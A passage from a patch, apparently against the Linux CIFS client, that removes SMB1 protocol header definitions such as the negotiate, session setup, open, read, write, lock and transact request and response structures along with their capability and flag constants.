+- *  and they are only used for the CIFSs PDUs themselves, not
+- *  internal cifs vfs structures
+- *
+- */
+-
+-typedef struct negotiate_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	unsigned char DialectsArray[];
+-} __attribute__((packed)) NEGOTIATE_REQ;
+-
+-#define MIN_TZ_ADJ (15 * 60) /* minimum grid for timezones in seconds */
+-
+-#define READ_RAW_ENABLE 1
+-#define WRITE_RAW_ENABLE 2
+-#define RAW_ENABLE (READ_RAW_ENABLE | WRITE_RAW_ENABLE)
+-#define SMB1_CLIENT_GUID_SIZE (16)
+-typedef struct negotiate_rsp {
+-	struct smb_hdr hdr;	/* wct = 17 */
+-	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;	/* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+-	__u16 ByteCount;
+-	union {
+-		/* cap extended security off */
+-		DECLARE_FLEX_ARRAY(unsigned char, EncryptionKey);
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[];
+-		} __attribute__((packed)) extended_response;
+-	} __attribute__((packed)) u;
+-} __attribute__((packed)) NEGOTIATE_RSP;
+-
+-/* SecurityMode bits */
+-#define SECMODE_USER          0x01	/* off indicates share level security */
+-#define SECMODE_PW_ENCRYPT    0x02
+-#define SECMODE_SIGN_ENABLED  0x04	/* SMB security signatures enabled */
+-#define SECMODE_SIGN_REQUIRED 0x08	/* SMB security signatures required */
+-
+-/* Negotiate response Capabilities */
+-#define CAP_RAW_MODE           0x00000001
+-#define CAP_MPX_MODE           0x00000002
+-#define CAP_UNICODE            0x00000004
+-#define CAP_LARGE_FILES        0x00000008
+-#define CAP_NT_SMBS            0x00000010	/* implies CAP_NT_FIND */
+-#define CAP_RPC_REMOTE_APIS    0x00000020
+-#define CAP_STATUS32           0x00000040
+-#define CAP_LEVEL_II_OPLOCKS   0x00000080
+-#define CAP_LOCK_AND_READ      0x00000100
+-#define CAP_NT_FIND            0x00000200
+-#define CAP_DFS                0x00001000
+-#define CAP_INFOLEVEL_PASSTHRU 0x00002000
+-#define CAP_LARGE_READ_X       0x00004000
+-#define CAP_LARGE_WRITE_X      0x00008000
+-#define CAP_LWIO               0x00010000 /* support fctl_srv_req_resume_key */
+-#define CAP_UNIX               0x00800000
+-#define CAP_COMPRESSED_DATA    0x02000000
+-#define CAP_DYNAMIC_REAUTH     0x20000000
+-#define CAP_PERSISTENT_HANDLES 0x40000000
+-#define CAP_EXTENDED_SECURITY  0x80000000
+-
+-typedef union smb_com_session_setup_andx {
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 12 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 SecurityBlobLength;
+-		__u32 Reserved;
+-		__le32 Capabilities;	/* see below */
+-		__le16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) req;	/* NTLM request format (with
+-					extended security */
+-
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 13 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 CaseInsensitivePasswordLength; /* ASCII password len */
+-		__le16 CaseSensitivePasswordLength; /* Unicode password length*/
+-		__u32 Reserved;	/* see below */
+-		__le32 Capabilities;
+-		__le16 ByteCount;
+-		unsigned char CaseInsensitivePassword[1];     /* followed by: */
+-		/* unsigned char * CaseSensitivePassword; */
+-		/* STRING AccountName */
+-		/* STRING PrimaryDomain */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) req_no_secext; /* NTLM request format (without
+-							extended security */
+-
+-	struct {		/* default (NTLM) response format */
+-		struct smb_hdr hdr;	/* wct = 4 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 Action;	/* see below */
+-		__le16 SecurityBlobLength;
+-		__u16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
+-/*      unsigned char  * NativeOS;      */
+-/*	unsigned char  * NativeLanMan;  */
+-/*      unsigned char  * PrimaryDomain; */
+-	} __attribute__((packed)) resp;	/* NTLM response
+-					   (with or without extended sec) */
+-
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 10 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 PasswordLength;
+-		__u32 Reserved; /* encrypt key len and offset */
+-		__le16 ByteCount;
+-		unsigned char AccountPassword[1];	/* followed by */
+-		/* STRING AccountName */
+-		/* STRING PrimaryDomain */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) old_req; /* pre-NTLM (LANMAN2.1) req format */
+-
+-	struct {		/* default (NTLM) response format */
+-		struct smb_hdr hdr;	/* wct = 3 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 Action;	/* see below */
+-		__u16 ByteCount;
+-		unsigned char NativeOS[1];	/* followed by */
+-/*	unsigned char * NativeLanMan; */
+-/*      unsigned char * PrimaryDomain; */
+-	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
+-} __attribute__((packed)) SESSION_SETUP_ANDX;
+-
+-/* format of NLTMv2 Response ie "case sensitive password" hash when NTLMv2 */
+-
+-#define NTLMSSP_SERVER_TYPE	1
+-#define NTLMSSP_DOMAIN_TYPE	2
+-#define NTLMSSP_FQ_DOMAIN_TYPE	3
+-#define NTLMSSP_DNS_DOMAIN_TYPE	4
+-#define NTLMSSP_DNS_PARENT_TYPE	5
+-
+-struct ntlmssp2_name {
+-	__le16 type;
+-	__le16 length;
+-/*	char   name[length]; */
+-} __attribute__((packed));
+-
+-struct ntlmv2_resp {
+-	union {
+-	    char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	    struct {
+-		__u8 reserved[8];
+-		__u8 key[CIFS_SERVER_CHALLENGE_SIZE];
+-	    } __attribute__((packed)) challenge;
+-	} __attribute__((packed));
+-	__le32 blob_signature;
+-	__u32  reserved;
+-	__le64  time;
+-	__u64  client_chal; /* random */
+-	__u32  reserved2;
+-	/* array of name entries could follow ending in minimum 4 byte struct */
+-} __attribute__((packed));
+-
+-
+-#define CIFS_NETWORK_OPSYS "CIFS VFS Client for Linux"
+-
+-/* Capabilities bits (for NTLM SessSetup request) */
+-#define CAP_UNICODE            0x00000004
+-#define CAP_LARGE_FILES        0x00000008
+-#define CAP_NT_SMBS            0x00000010
+-#define CAP_STATUS32           0x00000040
+-#define CAP_LEVEL_II_OPLOCKS   0x00000080
+-#define CAP_NT_FIND            0x00000200	/* reserved should be zero
+-				(because NT_SMBs implies the same thing?) */
+-#define CAP_BULK_TRANSFER      0x20000000
+-#define CAP_EXTENDED_SECURITY  0x80000000
+-
+-/* Action bits */
+-#define GUEST_LOGIN 1
+-
+-typedef struct smb_com_tconx_req {
+-	struct smb_hdr hdr;	/* wct = 4 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Flags;		/* see below */
+-	__le16 PasswordLength;
+-	__le16 ByteCount;
+-	unsigned char Password[1];	/* followed by */
+-/* STRING Path    *//* \\server\share name */
+-	/* STRING Service */
+-} __attribute__((packed)) TCONX_REQ;
+-
+-typedef struct smb_com_tconx_rsp {
+-	struct smb_hdr hdr;	/* wct = 3 , not extended response */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OptionalSupport;	/* see below */
+-	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
+-	/* STRING NativeFileSystem */
+-} __attribute__((packed)) TCONX_RSP;
+-
+-typedef struct smb_com_tconx_rsp_ext {
+-	struct smb_hdr hdr;	/* wct = 7, extended response */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OptionalSupport;	/* see below */
+-	__le32 MaximalShareAccessRights;
+-	__le32 GuestMaximalShareAccessRights;
+-	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
+-	/* STRING NativeFileSystem */
+-} __attribute__((packed)) TCONX_RSP_EXT;
+-
+-
+-/* tree connect Flags */
+-#define DISCONNECT_TID          0x0001
+-#define TCON_EXTENDED_SIGNATURES 0x0004
+-#define TCON_EXTENDED_SECINFO   0x0008
+-
+-/* OptionalSupport bits */
+-#define SMB_SUPPORT_SEARCH_BITS 0x0001	/* "must have" directory search bits
+-					 (exclusive searches supported) */
+-#define SMB_SHARE_IS_IN_DFS     0x0002
+-#define SMB_CSC_MASK               0x000C
+-/* CSC flags defined as follows */
+-#define SMB_CSC_CACHE_MANUAL_REINT 0x0000
+-#define SMB_CSC_CACHE_AUTO_REINT   0x0004
+-#define SMB_CSC_CACHE_VDO          0x0008
+-#define SMB_CSC_NO_CACHING         0x000C
+-#define SMB_UNIQUE_FILE_NAME    0x0010
+-#define SMB_EXTENDED_SIGNATURES 0x0020
+-
+-/* services
+- *
+- * A:       ie disk
+- * LPT1:    ie printer
+- * IPC      ie named pipe
+- * COMM
+- * ?????    ie any type
+- *
+- */
+-
+-typedef struct smb_com_echo_req {
+-	struct	smb_hdr hdr;
+-	__le16	EchoCount;
+-	__le16	ByteCount;
+-	char	Data[1];
+-} __attribute__((packed)) ECHO_REQ;
+-
+-typedef struct smb_com_echo_rsp {
+-	struct	smb_hdr hdr;
+-	__le16	SequenceNumber;
+-	__le16	ByteCount;
+-	char	Data[1];
+-} __attribute__((packed)) ECHO_RSP;
+-
+-typedef struct smb_com_logoff_andx_req {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__u16 AndXOffset;
+-	__u16 ByteCount;
+-} __attribute__((packed)) LOGOFF_ANDX_REQ;
+-
+-typedef struct smb_com_logoff_andx_rsp {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__u16 AndXOffset;
+-	__u16 ByteCount;
+-} __attribute__((packed)) LOGOFF_ANDX_RSP;
+-
+-typedef union smb_com_tree_disconnect {	/* as an altetnative can use flag on
+-					tree_connect PDU to effect disconnect */
+-					/* tdis is probably simplest SMB PDU */
+-	struct {
+-		struct smb_hdr hdr;	/* wct = 0 */
+-		__u16 ByteCount;	/* bcc = 0 */
+-	} __attribute__((packed)) req;
+-	struct {
+-		struct smb_hdr hdr;	/* wct = 0 */
+-		__u16 ByteCount;	/* bcc = 0 */
+-	} __attribute__((packed)) resp;
+-} __attribute__((packed)) TREE_DISCONNECT;
+-
+-typedef struct smb_com_close_req {
+-	struct smb_hdr hdr;	/* wct = 3 */
+-	__u16 FileID;
+-	__u32 LastWriteTime;	/* should be zero or -1 */
+-	__u16 ByteCount;	/* 0 */
+-} __attribute__((packed)) CLOSE_REQ;
+-
+-typedef struct smb_com_close_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) CLOSE_RSP;
+-
+-typedef struct smb_com_flush_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__u16 FileID;
+-	__u16 ByteCount;	/* 0 */
+-} __attribute__((packed)) FLUSH_REQ;
+-
+-typedef struct smb_com_findclose_req {
+-	struct smb_hdr hdr; /* wct = 1 */
+-	__u16 FileID;
+-	__u16 ByteCount;    /* 0 */
+-} __attribute__((packed)) FINDCLOSE_REQ;
+-
+-/* OpenFlags */
+-#define REQ_MORE_INFO      0x00000001  /* legacy (OPEN_AND_X) only */
+-#define REQ_OPLOCK         0x00000002
+-#define REQ_BATCHOPLOCK    0x00000004
+-#define REQ_OPENDIRONLY    0x00000008
+-#define REQ_EXTENDED_INFO  0x00000010
+-
+-/* File type */
+-#define DISK_TYPE		0x0000
+-#define BYTE_PIPE_TYPE		0x0001
+-#define MESSAGE_PIPE_TYPE	0x0002
+-#define PRINTER_TYPE		0x0003
+-#define COMM_DEV_TYPE		0x0004
+-#define UNKNOWN_TYPE		0xFFFF
+-
+-/* Device Type or File Status Flags */
+-#define NO_EAS			0x0001
+-#define NO_SUBSTREAMS		0x0002
+-#define NO_REPARSETAG		0x0004
+-/* following flags can apply if pipe */
+-#define ICOUNT_MASK		0x00FF
+-#define PIPE_READ_MODE		0x0100
+-#define NAMED_PIPE_TYPE		0x0400
+-#define PIPE_END_POINT		0x4000
+-#define BLOCKING_NAMED_PIPE	0x8000
+-
+-typedef struct smb_com_open_req {	/* also handles create */
+-	struct smb_hdr hdr;	/* wct = 24 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 Reserved;		/* Must Be Zero */
+-	__le16 NameLength;
+-	__le32 OpenFlags;
+-	__u32  RootDirectoryFid;
+-	__le32 DesiredAccess;
+-	__le64 AllocationSize;
+-	__le32 FileAttributes;
+-	__le32 ShareAccess;
+-	__le32 CreateDisposition;
+-	__le32 CreateOptions;
+-	__le32 ImpersonationLevel;
+-	__u8 SecurityFlags;
+-	__le16 ByteCount;
+-	char fileName[1];
+-} __attribute__((packed)) OPEN_REQ;
+-
+-/* open response: oplock levels */
+-#define OPLOCK_NONE  	 0
+-#define OPLOCK_EXCLUSIVE 1
+-#define OPLOCK_BATCH	 2
+-#define OPLOCK_READ	 3  /* level 2 oplock */
+-
+-/* open response for CreateAction shifted left */
+-#define CIFS_CREATE_ACTION 0x20000 /* file created */
+-
+-typedef struct smb_com_open_rsp {
+-	struct smb_hdr hdr;	/* wct = 34 BB */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 OplockLevel;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le16 FileType;
+-	__le16 DeviceState;
+-	__u8 DirectoryFlag;
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) OPEN_RSP;
+-
+-typedef struct smb_com_open_rsp_ext {
+-	struct smb_hdr hdr;     /* wct = 42 but meaningless due to MS bug? */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 OplockLevel;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le16 FileType;
+-	__le16 DeviceState;
+-	__u8 DirectoryFlag;
+-	__u8 VolumeGUID[16];
+-	__u64 FileId; /* note no endian conversion - is opaque UniqueID */
+-	__le32 MaximalAccessRights;
+-	__le32 GuestMaximalAccessRights;
+-	__u16 ByteCount;        /* bct = 0 */
+-} __attribute__((packed)) OPEN_RSP_EXT;
+-
+-
+-/* format of legacy open request */
+-typedef struct smb_com_openx_req {
+-	struct smb_hdr	hdr;	/* wct = 15 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OpenFlags;
+-	__le16 Mode;
+-	__le16 Sattr; /* search attributes */
+-	__le16 FileAttributes;  /* dos attrs */
+-	__le32 CreateTime; /* os2 format */
+-	__le16 OpenFunction;
+-	__le32 EndOfFile;
+-	__le32 Timeout;
+-	__le32 Reserved;
+-	__le16  ByteCount;  /* file name follows */
+-	char   fileName[1];
+-} __attribute__((packed)) OPENX_REQ;
+-
+-typedef struct smb_com_openx_rsp {
+-	struct smb_hdr	hdr;	/* wct = 15 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16  Fid;
+-	__le16 FileAttributes;
+-	__le32 LastWriteTime; /* os2 format */
+-	__le32 EndOfFile;
+-	__le16 Access;
+-	__le16 FileType;
+-	__le16 IPCState;
+-	__le16 Action;
+-	__u32  FileId;
+-	__u16  Reserved;
+-	__u16  ByteCount;
+-} __attribute__((packed)) OPENX_RSP;
+-
+-/* For encoding of POSIX Open Request - see trans2 function 0x209 data struct */
+-
+-/* Legacy write request for older servers */
+-typedef struct smb_com_writex_req {
+-	struct smb_hdr hdr;     /* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__u32 Reserved; /* Timeout */
+-	__le16 WriteMode; /* 1 = write through */
+-	__le16 Remaining;
+-	__le16 Reserved2;
+-	__le16 DataLengthLow;
+-	__le16 DataOffset;
+-	__le16 ByteCount;
+-	__u8 Pad;		/* BB check for whether padded to DWORD
+-				   boundary and optimum performance here */
+-	char Data[];
+-} __attribute__((packed)) WRITEX_REQ;
+-
+-typedef struct smb_com_write_req {
+-	struct smb_hdr hdr;	/* wct = 14 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__u32 Reserved;
+-	__le16 WriteMode;
+-	__le16 Remaining;
+-	__le16 DataLengthHigh;
+-	__le16 DataLengthLow;
+-	__le16 DataOffset;
+-	__le32 OffsetHigh;
+-	__le16 ByteCount;
+-	__u8 Pad;		/* BB check for whether padded to DWORD
+-				   boundary and optimum performance here */
+-	char Data[];
+-} __attribute__((packed)) WRITE_REQ;
+-
+-typedef struct smb_com_write_rsp {
+-	struct smb_hdr hdr;	/* wct = 6 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Count;
+-	__le16 Remaining;
+-	__le16 CountHigh;
+-	__u16  Reserved;
+-	__u16 ByteCount;
+-} __attribute__((packed)) WRITE_RSP;
+-
+-/* legacy read request for older servers */
+-typedef struct smb_com_readx_req {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__le16 MaxCount;
+-	__le16 MinCount;	/* obsolete */
+-	__le32 Reserved;
+-	__le16 Remaining;
+-	__le16 ByteCount;
+-} __attribute__((packed)) READX_REQ;
+-
+-typedef struct smb_com_read_req {
+-	struct smb_hdr hdr;	/* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__le16 MaxCount;
+-	__le16 MinCount;		/* obsolete */
+-	__le32 MaxCountHigh;
+-	__le16 Remaining;
+-	__le32 OffsetHigh;
+-	__le16 ByteCount;
+-} __attribute__((packed)) READ_REQ;
+-
+-typedef struct smb_com_read_rsp {
+-	struct smb_hdr hdr;	/* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Remaining;
+-	__le16 DataCompactionMode;
+-	__le16 Reserved;
+-	__le16 DataLength;
+-	__le16 DataOffset;
+-	__le16 DataLengthHigh;
+-	__u64 Reserved2;
+-	__u16 ByteCount;
+-	/* read response data immediately follows */
+-} __attribute__((packed)) READ_RSP;
+-
+-typedef struct locking_andx_range {
+-	__le16 Pid;
+-	__le16 Pad;
+-	__le32 OffsetHigh;
+-	__le32 OffsetLow;
+-	__le32 LengthHigh;
+-	__le32 LengthLow;
+-} __attribute__((packed)) LOCKING_ANDX_RANGE;
+-
+-#define LOCKING_ANDX_SHARED_LOCK     0x01
+-#define LOCKING_ANDX_OPLOCK_RELEASE  0x02
+-#define LOCKING_ANDX_CHANGE_LOCKTYPE 0x04
+-#define LOCKING_ANDX_CANCEL_LOCK     0x08
+-#define LOCKING_ANDX_LARGE_FILES     0x10	/* always on for us */
+-
+-typedef struct smb_com_lock_req {
+-	struct smb_hdr hdr;	/* wct = 8 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__u8 LockType;
+-	__u8 OplockLevel;
+-	__le32 Timeout;
+-	__le16 NumberOfUnlocks;
+-	__le16 NumberOfLocks;
+-	__le16 ByteCount;
+-	LOCKING_ANDX_RANGE Locks[1];
+-} __attribute__((packed)) LOCK_REQ;
+-
+-/* lock type */
+-#define CIFS_RDLCK	0
+-#define CIFS_WRLCK	1
+-#define CIFS_UNLCK      2
+-typedef struct cifs_posix_lock {
+-	__le16  lock_type;  /* 0 = Read, 1 = Write, 2 = Unlock */
+-	__le16  lock_flags; /* 1 = Wait (only valid for setlock) */
+-	__le32  pid;
+-	__le64	start;
+-	__le64	length;
+-	/* BB what about additional owner info to identify network client */
+-} __attribute__((packed)) CIFS_POSIX_LOCK;
+-
+-typedef struct smb_com_lock_rsp {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 ByteCount;
+-} __attribute__((packed)) LOCK_RSP;
+-
+-typedef struct smb_com_rename_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__le16 SearchAttributes;	/* target file attributes */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName */
+-} __attribute__((packed)) RENAME_REQ;
+-
+-	/* copy request flags */
+-#define COPY_MUST_BE_FILE      0x0001
+-#define COPY_MUST_BE_DIR       0x0002
+-#define COPY_TARGET_MODE_ASCII 0x0004 /* if not set, binary */
+-#define COPY_SOURCE_MODE_ASCII 0x0008 /* if not set, binary */
+-#define COPY_VERIFY_WRITES     0x0010
+-#define COPY_TREE              0x0020
+-
+-typedef struct smb_com_copy_req {
+-	struct smb_hdr hdr;	/* wct = 3 */
+-	__u16 Tid2;
+-	__le16 OpenFunction;
+-	__le16 Flags;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName string */
+-} __attribute__((packed)) COPY_REQ;
+-
+-typedef struct smb_com_copy_rsp {
+-	struct smb_hdr hdr;     /* wct = 1 */
+-	__le16 CopyCount;    /* number of files copied */
+-	__u16 ByteCount;    /* may be zero */
+-	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
+-	unsigned char ErrorFileName[1]; /* only present if error in copy */
+-} __attribute__((packed)) COPY_RSP;
+-
+-#define CREATE_HARD_LINK		0x103
+-#define MOVEFILE_COPY_ALLOWED		0x0002
+-#define MOVEFILE_REPLACE_EXISTING	0x0001
+-
+-typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
+-	struct smb_hdr hdr;	/* wct = 4 */
+-	__le16 SearchAttributes;	/* target file attributes */
+-	__le16 Flags;		/* spec says Information Level */
+-	__le32 ClusterCount;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
+-	unsigned char OldFileName[1];
+-	/* followed by __u8 BufferFormat2 */
+-	/* followed by NewFileName */
+-} __attribute__((packed)) NT_RENAME_REQ;
+-
+-typedef struct smb_com_rename_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) RENAME_RSP;
+-
+-typedef struct smb_com_delete_file_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__le16 SearchAttributes;
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char fileName[1];
+-} __attribute__((packed)) DELETE_FILE_REQ;
+-
+-typedef struct smb_com_delete_file_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) DELETE_FILE_RSP;
+-
+-typedef struct smb_com_delete_directory_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
+-} __attribute__((packed)) DELETE_DIRECTORY_REQ;
+-
+-typedef struct smb_com_delete_directory_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) DELETE_DIRECTORY_RSP;
+-
+-typedef struct smb_com_create_directory_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	__u8 BufferFormat;	/* 4 = ASCII */
+-	unsigned char DirName[1];
+-} __attribute__((packed)) CREATE_DIRECTORY_REQ;
+-
+-typedef struct smb_com_create_directory_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) CREATE_DIRECTORY_RSP;
+-
+-typedef struct smb_com_query_information_req {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__le16 ByteCount;	/* 1 + namelen + 1 */
+-	__u8 BufferFormat;      /* 4 = ASCII */
+-	unsigned char FileName[1];
+-} __attribute__((packed)) QUERY_INFORMATION_REQ;
+-
+-typedef struct smb_com_query_information_rsp {
+-	struct smb_hdr hdr;     /* wct = 10 */
+-	__le16 attr;
+-	__le32  last_write_time;
+-	__le32 size;
+-	__u16  reserved[5];
+-	__le16 ByteCount;	/* bcc = 0 */
+-} __attribute__((packed)) QUERY_INFORMATION_RSP;
+-
+-typedef struct smb_com_setattr_req {
+-	struct smb_hdr hdr; /* wct = 8 */
+-	__le16 attr;
+-	__le16 time_low;
+-	__le16 time_high;
+-	__le16 reserved[5]; /* must be zero */
+-	__u16  ByteCount;
+-	__u8   BufferFormat; /* 4 = ASCII */
+-	unsigned char fileName[1];
+-} __attribute__((packed)) SETATTR_REQ;
+-
+-typedef struct smb_com_setattr_rsp {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__u16 ByteCount;        /* bct = 0 */
+-} __attribute__((packed)) SETATTR_RSP;
+-
+-/* empty wct response to setattr */
+-
+-/*******************************************************/
+-/* NT Transact structure definitions follow            */
+-/* Currently only ioctl, acl (get security descriptor) */
+-/* and notify are implemented                          */
+-/*******************************************************/
+-typedef struct smb_com_ntransact_req {
+-	struct smb_hdr hdr; /* wct >= 19 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	/* SetupCount words follow then */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__u8 Parms[];
+-} __attribute__((packed)) NTRANSACT_REQ;
+-
+-typedef struct smb_com_ntransact_rsp {
+-	struct smb_hdr hdr;     /* wct = 18 */
+-	__u8 Reserved[3];
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 ParameterDisplacement;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__le32 DataDisplacement;
+-	__u8 SetupCount;   /* 0 */
+-	__u16 ByteCount;
+-	/* __u8 Pad[3]; */
+-	/* parms and data follow */
+-} __attribute__((packed)) NTRANSACT_RSP;
+-
+-/* See MS-SMB 2.2.7.2.1.1 */
+-struct srv_copychunk {
+-	__le64 SourceOffset;
+-	__le64 DestinationOffset;
+-	__le32 CopyLength;
+-	__u32  Reserved;
+-} __packed;
+-
+-typedef struct smb_com_transaction_ioctl_req {
+-	struct smb_hdr hdr;	/* wct = 23 */
+-	__u8 MaxSetupCount;
+-	__u16 Reserved;
+-	__le32 TotalParameterCount;
+-	__le32 TotalDataCount;
+-	__le32 MaxParameterCount;
+-	__le32 MaxDataCount;
+-	__le32 ParameterCount;
+-	__le32 ParameterOffset;
+-	__le32 DataCount;
+-	__le32 DataOffset;
+-	__u8 SetupCount; /* four setup words follow subcommand */
+-	/* SNIA spec incorrectly included spurious pad here */
+-	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
+-	__le32 FunctionCode;
+-	__u16 Fid;
+-	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
+-	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
+-	__le16 ByteCount;
+-	__u8 Pad[3];
+-	__u8 Data[1];
+-} __attribute__((packed)) TRANSACT_IOCTL_REQ;
+-
+-typedef struct smb_com_transaction_compr_ioctl_req {
